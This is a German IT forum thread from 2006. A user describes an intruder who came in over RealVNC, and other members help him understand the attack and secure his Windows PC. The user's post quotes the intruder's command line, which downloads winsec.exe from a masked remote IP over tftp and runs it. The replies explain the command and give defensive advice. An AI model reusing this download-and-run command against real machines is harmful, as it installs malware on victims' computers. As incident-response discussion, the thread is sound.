Top-Themen

AppleEntwicklungHardwareInternetLinuxMicrosoftMultimediaNetzwerkeOff TopicSicherheitSonstige SystemeVirtualisierungWeiterbildungZusammenarbeit

Aktuelle Themen

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit
GELÖST

Hacker war über RealVNC auf meine PC

Frage Sicherheit Erkennung und -Abwehr

Mitglied: FreakyF

FreakyF (Level 2) - Jetzt verbinden

13.10.2006, aktualisiert 18:09 Uhr, 12124 Aufrufe, 12 Kommentare

Hallo!

Ich hab auf meinem Windows 2000 Rechner RealVNC laufen, damit ich von der Arbeit aus auf diesen zugreifen kann.
Heute ist mir aufgefallen, dass in der Taskleiste ungefähr 10 mal cmd geöffnet war, obwohl ich diese nicht geöffnet hatte.
Einmal mit Tippfehler. Nachdem ich die CMD-Fenster geschlossen hatte, klickte mein Mauszeiger automatisch auf "ausführen" und gab den selben Code zum 11. mal ein.
Folgendes wurde unter "ausführen" eingegeben:

cmd /c tftp -i xx.xxx.xx.xxx GET winsec.exe &start winsec.exe &exit

(anstelle der x stand eine mir unbekannte IP-Adresse).
Zone Alarm fragte, ob es tftp zulassen soll. Diese Frage konnte der Hacker nicht beantworten, weil man via VNC keine Änderungen an Zone Alarm vornehmen kann.
(Hab ich selber getestet, weil ich mich gefragt hatte, warum der Hacker nicht einfach auf "zulassen" geklickt hat).
Die Verbindung von VNC hab ich mit einem 6 stelligen Passwort geschützt. Dies muss man am Anfang eingeben, damit man sich mit meinem PC verbinden kann. Trotzdem konnte sich der Hacker mit meinem PC verbinden.

Meine Fragen:

1. Was bewirkt der Code bzw. was wollte der Hacker erreichen?
2. Könnt irgendwas Schädliches auf meinem PC jetzt sein?
3. Wie kam der Hacker innerhalb eines Vormittags auf meine IP+Passwort?
4. Was kann ich tun, damit dies nicht nochmal passiert?


Vielen Dank
Mitglied: Shaby
13.10.2006 um 16:42 Uhr
1. Was bewirkt der Code bzw. was wollte der
Hacker erreichen?

Dieser wollte wahrscheinlich eine Datei auf deinen PC laden tftp = Trivial File Transer Protocol

2. Könnt irgendwas Schädliches auf
meinem PC jetzt sein?

Ist immer möglich. Virenscanner aktualisieren und evtl. ein Rootkit Scanner installieren und durchlaufen lassen.

3. Wie kam der Hacker innerhalb eines
Vormittags auf meine IP+Passwort?

Wenn du von deinem Geschäft aus diese Verbindung aufbaust, kann er sehr leicht einen Sniffer einbauen. Sonst gibt es Trojaner, Keylogger oder viele andere Möglichkeiten

4. Was kann ich tun, damit dies nicht
nochmal passiert?

Evtl. VPN Tunnel einrichten, oder z.B. www.logmein.com hier wird die verbindung auch verschlüsselt

Weitere Ideen?

Grüsse Shaby
Bitte warten ..
Mitglied: Shaby
13.10.2006 um 16:47 Uhr
Mir ist noch eingefallen:

Du hast wahrscheinlich die IP deines Angreifers - Hier im Forum hat es noch ein Turitorial betreffend Scrippt Kiddies sicher interessant für dich.

Ein guter Hacker kann das auch nicht gewesen sein, denn die hinterlassen nicht so offensichtliche Spuren
Bitte warten ..
Mitglied: cykes
13.10.2006 um 16:51 Uhr
Hi,

welche Version von VNC hast Du denn installiert, soweit ich weiss gab es eine Version,
die einen Fehler hatte, der es erlaubte, sich ohne Passwort anzumelden (war glaub Version 4.0 von realVNC).

Also zuerst mal auf eine aktuelle VNC Version updaten.

Ein 6 stelliges Passwort ist nicht besonders sicher und mittels eines Passwort Testers relativ schnell gehackt, ich würde für einen Zugang, der direkt über das Internet erreichbar ist mindestens ein 8 stelliges besser noch längeres kryptisches Passwort gemischt aus Zahlen,
Buschstaben und Sonderzeichen verwenden.

Ich würde VNC erstmal komplett ausschalten und den PC einer gründlichen Untersuchung
mit verschiedenen Spyware-, Adware- und Virenscannern unterziehen.

Die in der Kommandozeile erwähnte winsec.exe könnte einen Bot/Wurm/Trojaner enthalten,
aber er hat es ja offensichtliche nicht geschafft, diese auszuführen.

Du könntest mir mal die IP per PM schicken, dann kann man mal schauen, woher der Angriff
kam.

Gruß

cykes
Bitte warten ..
Mitglied: FreakyF
13.10.2006 um 16:58 Uhr
Vielen Dank für die schnelle Antwort.


> 1. Was bewirkt der Code bzw. was wollte
der
> Hacker erreichen?

Dieser wollte wahrscheinlich eine Datei auf
deinen PC laden tftp = Trivial File Transer
Protocol


Was wollte der Hacker mit winsec.exe?
Mich würde interessieren, was diese exe für eine Funktion hat.
Außerdem warum benutzt er &start und &exit? Dies kommt in der Sytax von tftp doch gar nicht vor.


> 2. Könnt irgendwas
Schädliches auf
> meinem PC jetzt sein?

Ist immer möglich. Virenscanner
aktualisieren und evtl. ein Rootkit Scanner
installieren und durchlaufen lassen.


Mit Rootkit Scannern kenn ich mich leider (noch) nicht aus, gibt es welche, die man empfehlen könnte. Am besten Freeware. Danke!


> 4. Was kann ich tun, damit dies nicht
> nochmal passiert?

Evtl. VPN Tunnel einrichten, oder z.B.
www.logmein.com hier wird die verbindung auch
verschlüsselt

Weitere Ideen?


Damit werd ich mich mal auseinander setzen.
Bitte warten ..
Mitglied: FreakyF
13.10.2006 um 17:05 Uhr
welche Version von VNC hast Du denn
installiert, soweit ich weiss gab es eine
Version,
die einen Fehler hatte, der es erlaubte,
sich ohne Passwort anzumelden (war glaub
Version 4.0 von realVNC).

Ich hab VNC 4.1 von chip.de

Also zuerst mal auf eine aktuelle VNC
Version updaten.

Ich denke, das ist die aktuellste Version.

Ein 6 stelliges Passwort ist nicht besonders
sicher und mittels eines Passwort Testers
relativ schnell gehackt, ich würde
für einen Zugang, der direkt über
das Internet erreichbar ist mindestens ein 8
stelliges besser noch längeres
kryptisches Passwort gemischt aus Zahlen,
Buschstaben und Sonderzeichen verwenden.

Ich kenn mich ein bisschen mit Passwortsicherheit aus, dass man ein 6 stelliges aber so schnell hat, war mir nicht bekannt.

Ich würde VNC erstmal komplett
ausschalten und den PC einer gründlichen
Untersuchung
mit verschiedenen Spyware-, Adware- und
Virenscannern unterziehen.

VNC ist jetzt natürlich aus, hab mir eine neue IP zuweisen lassen und werd in den nächsten Tagen den PC checken. Soll ich auch einen Rootkit Scanner durchlaufen lassen? Wenn ja, welcher ist empfehlenswert?

Die in der Kommandozeile erwähnte
winsec.exe könnte einen
Bot/Wurm/Trojaner enthalten,
aber er hat es ja offensichtliche nicht
geschafft, diese auszuführen.

Nein das hat er so wie es für mich aussieht nicht geschafft.
Bitte warten ..
Mitglied: 11078
13.10.2006 um 17:16 Uhr
Hallo,

Ich kenn mich ein bisschen mit
Passwortsicherheit aus, dass man ein 6
stelliges aber so schnell hat, war mir nicht
bekannt.

Es kommt auch ein wenig auf die Qualität des Passworts an!

a) Kein Wort, das in irgendeinem Wörterbuch der Erde vorkommen kann ("MickyMaus" hat sogar 9 Buchstaben, aber den Rechner könnte auch ich "hacken").
b) Deshalb am besten sinnlose Kombinationen (siehe mein Vorredner: Zahlen, Buchstaben, Sonderzeichen)

Zur Not erstell Dir ein Eselslücken-Passwort:

--> Mein Computer, den ich sehr mag, wurde schon achtmal gehackt --> Anfangsbuchstaben: MC,ddism,ws8g

Super Passwort, nicht?


VNC ist jetzt natürlich aus, hab mir
eine neue IP zuweisen lassen und werd in den
nächsten Tagen den PC checken. Soll ich
auch einen Rootkit Scanner durchlaufen
lassen? Wenn ja, welcher ist empfehlenswert?

http://www.sophos.de/products/free-tools/sophos-anti-rootkit.html
http://www.pctipp.ch/downloads/dl/34539.asp?rssdloads


Gruß,
Tim
Bitte warten ..
Mitglied: FreakyF
13.10.2006 um 17:18 Uhr
Zur Not erstell Dir ein
Eselslücken-Passwort:

--> Mein Computer, den ich sehr mag,
wurde schon achtmal gehackt -->
Anfangsbuchstaben: MC,ddism,ws8g

Super Passwort, nicht?

So ein Passwort werd ich mir jetzt natürlich zulegen!


Soll ich
> auch einen Rootkit Scanner durchlaufen
> lassen? Wenn ja, welcher ist
empfehlenswert?

http://www.sophos.de/products/free-tools/sophos-anti-rootkit.html
http://www.pctipp.ch/downloads/dl/34539.asp?rssdloads


Danke Tim!
Bitte warten ..
Mitglied: FreakyF
13.10.2006 um 17:37 Uhr
Wie schon erwähnt wurde, wollte der Hacker evt. einen Virus übertragen.
Doch warum nimmt er dazu die winsec.exe
Was hat die exe für eine Funktion.
Außerdem warum benutzt er &start und &exit? Dies kommt in der Sytax von tftp doch gar nicht vor.
Wollte der Hacker meinen PC als eine Art Abstellplatz für Daten verwenden oder hatte er etwas anderes vor?

Danke für Tipps!
Bitte warten ..
Mitglied: cykes
13.10.2006 um 17:45 Uhr
Hi,

da gibt es ganz verschiedene Möglichkeiten, scheinbar war er erst am Anfang seiner "Arbeit"
und hat erstmal nach Möglichkeiten gesucht, irgendwelche "Tools" zu installieren.
Sieht auf jeden Fall sehr nach nem ScriptKiddie aus.
Würde mir da nicht zu viele Sorgen machen, wenn Du den Rechner überprüft hast und er OK ist,
dann den VNC besser absichern und obvenstehende Tips befolgen, dann passt das schon
wieder.

Gruß

cykes
Bitte warten ..
Mitglied: 11078
13.10.2006 um 18:04 Uhr
Hallo,

Wie schon erwähnt wurde, wollte der
Hacker evt. einen Virus übertragen.
Doch warum nimmt er dazu die winsec.exe

Winsec.exe ist ein Schadprogramm und kein Windows-Tool!

http://www.securitystronghold.com/gates/spyware-adware-solutions/Window ...
http://www.bleepingcomputer.com/startups/winsecexe-6510.html


Was hat die exe für eine Funktion.
Außerdem warum benutzt er &start
und &exit? Dies kommt in der Sytax von
tftp doch gar nicht vor.

& ist in der CMD-Shell ein Befehlsseparator. Das stellt sicher, dass alle Ausdrücke, vor denen & steht als eigener Befehl interpretiert werden und nicht als Parameter des vorhergehenden.

Wollte der Hacker meinen PC als eine Art
Abstellplatz für Daten verwenden oder
hatte er etwas anderes vor?

Er hatte vor, das Programm winsec.exe auf Deinen Rechner zu bringen und es zu starten. Das Programm hätte sich dann in die Registry eingetragen, um dauerhaft immer automatisch mitgestartet zu werden. Wie es aussieht, ist winsec.exe eine Variante der "Cool Web Search"-Malware. Das hätte auf jeden Fall dazu geführt, dass Du mit Popups usw. belästigt worden wärst; dein Browser wäre auf eine andere Startseite umgeleitet worden und evtl. wäre auch Deine hosts-Datei bearbeitet worden. Alles in allem sehe ich das eher als Nervigkeit, nicht aber als unbedingte Gefahr (soviel zur ersten Beruhigung).


Eventuell wäre es gut, wenn Du mal Adaware laufen lässt!


Gruß,
Tim
Bitte warten ..
Mitglied: FreakyF
13.10.2006 um 18:09 Uhr

Sprich die exe ist bei windows gar nicht dabei, wenn Sie jetzt also drauf ist, ist sie verdächtig?



> Außerdem warum benutzt er
&start
> und &exit? Dies kommt in der Sytax
von
> tftp doch gar nicht vor.

& ist in der CMD-Shell ein
Befehlsseparator. Das stellt sicher, dass
alle Ausdrücke, vor denen & steht
als eigener Befehl interpretiert werden und
nicht als Parameter des vorhergehenden.

&start bedeutet also, dass das Programm gestartet wird?
Bitte warten ..
Neuester Wissensbeitrag
Ähnliche Inhalte
IDE & Editoren
USB STICK Datei AUTOMATISCH beim anschliessen auf fremden PC öffnen (9)

Frage von Jwanner83 zum Thema IDE & Editoren ...

Batch & Shell
gelöst WinXP-PC mit einem Barcodescanner herunterfahren (8)

Frage von Sinzal zum Thema Batch & Shell ...

CPU, RAM, Mainboards
Angetestet: PC Engines APU 3a2 im Rack-Gehäuse (2)

Erfahrungsbericht von ashnod zum Thema CPU, RAM, Mainboards ...

Heiß diskutierte Inhalte
Windows Userverwaltung
Ausgeschiedene Mitarbeiter im Unternehmen - was tun mit den AD Konten? (33)

Frage von patz223 zum Thema Windows Userverwaltung ...

LAN, WAN, Wireless
Server erkennt Client nicht wenn er ausserhalb des DHCP Pools liegt (22)

Frage von Mar-west zum Thema LAN, WAN, Wireless ...

LAN, WAN, Wireless
FritzBox, zwei Server, verschiedene Netze (21)

Frage von DavidGl zum Thema LAN, WAN, Wireless ...

Viren und Trojaner
Aufgepasst: Neue Ransomware Goldeneye verbreitet sich rasant (20)

Link von Penny.Cilin zum Thema Viren und Trojaner ...